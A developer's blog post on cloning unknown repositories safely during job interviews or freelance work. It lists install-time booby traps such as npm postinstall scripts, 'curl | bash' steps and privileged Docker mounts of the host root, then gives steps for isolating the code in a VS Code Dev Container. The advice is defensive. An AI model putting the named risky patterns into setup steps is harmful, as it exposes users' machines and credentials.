Safe Repository Cloning for Developers during interviews —  Setup #1

Thibault FriedrichThibault Friedrich
4 min read

As a developer, you’ll eventually be asked to clone a repository you’ve never seen — maybe during a technical interview, maybe for a freelance gig where you have to quickly run and tweak the code.

That’s normal. What’s not normal is blindly running whatever the repo tells you to run.

Over the past few years, more devs have caught malicious or just reckless scripts firing during setup — usually buried in install hooks or convenience scripts. If you treat git clone && npm install && npm start like muscle memory, you’re one copy‑paste away from a bad day.

Even if you trust the company that gave you the repository, don’t assume the code is automatically safe. They might be completely unaware of the risks hidden in install scripts — or worse, one of their dependencies could be compromised without their knowledge.

That’s why vigilance isn’t just for “sketchy” projects. It’s a habit you should keep, no matter who sends you the code.

This post is a quick, practical guide to cloning unknown code safely.

What Can Go Wrong?

Running unknown code can:

Exfiltrate secrets: Grab your SSH keys, cloud creds, browser cookies, or environment variables and ship them off.

Plant persistence: Drop launch agents/services, scheduled tasks, or Git hooks that re-trigger later.

Cryptomine or DDoS: Burn your CPU/GPU and bandwidth while you’re “just testing.”

Tamper with your system: Modify shell RC files, PATH, package managers, or Docker daemon settings.

Most of the damage doesn’t happen at git clone. It happens when you install or run: install/postinstall scripts, make, docker compose up, pip install, etc.

The common booby traps to Look for are:

Package scripts (Node): preinstall, install, postinstall, prepare in package.json.

Git hooks installers: tools like Husky run via postinstall and can create hooks that execute on future commits.

Shell scripts: Anything the README says to curl | bash. Hard pass unless you read it.

Python: setup.py, pyproject.toml build backends, custom install steps.

Docker/Compose: privileged: true, host mounts like /:/host, unknown public images, or containers that run as root.

Makefiles: “friendly” targets that hide destructive commands.

Binary blobs: Prebuilt executables that you can’t audit easily.

Unfortunately, during a job interview or your first freelance gig, stress can cloud your judgment. You just want to get the code running and show results — so you skip the careful review.

That’s exactly when you’re most vulnerable. Malicious or risky scripts are often subtle, buried deep in install steps or disguised as harmless setup commands. Some are so well-hidden that even experienced developers miss them at first glance.

The solution?

A lot of solutions exist to isolate the repository but there is that is very easy to use and that I suggest everytime: VS Code Dev Container.

You just need to follow the steps:

  1. Install VS Code (most of the time, this step is already done 😉

  2. Install Docker (Docker Desktop for macOS)

  3. Install Dev Container Extension in VS Code

  4. In VS Code, open the command palette (Ctrl+Shift+P or Cmd+Shift+P on macOS)

  5. Type Dev Containers

  6. Choose the action "Dev Containers: Clone Repository in Container Volume…"

  7. Enter the url of the repository

  8. Select an image to run the project. For Javascript the “node.js & Typescript” image works very well.

Notice that if the repository is provided as a zip, you can follow similar steps:

  • Choose the action "Dev Containers: New Dev Container"

  • Drag and drop the zip file in the VS Code Dev Container

  • Open the terminal

  • Type the command "unzip <zip filename>"

At the end, you have a perfectly working project in VS Code but isolated from the rest of your machine. If you open "Terminal" > "New Terminal", you also have access to a terminal in this docker.

You have then a full developer environment. You won't have the other VS Code extensions or your favorite shell aliases but it is a good compromise to be safe.

Next time you have to download a repository for an interview or freelance gig, please follow these steps and don't your machine in danger.

You liked this article? Remember to check

0
Subscribe to my newsletter

Read articles from Thibault Friedrich directly inside your inbox. Subscribe to the newsletter, and don't miss out.

GitSecurityinterviewFreelancing

Written by

Thibault Friedrich
Thibault Friedrich

I am a French frontend/React developer living in Montréal 🍁. I love everything about science-fiction and Ux Design. One of my new passion is also Code Craftsmanship. I am currently working happily for a canadian company as a Senior Frontend Developer. I am also the main contributor of a learning platform for front-end developers: Learn_frontend.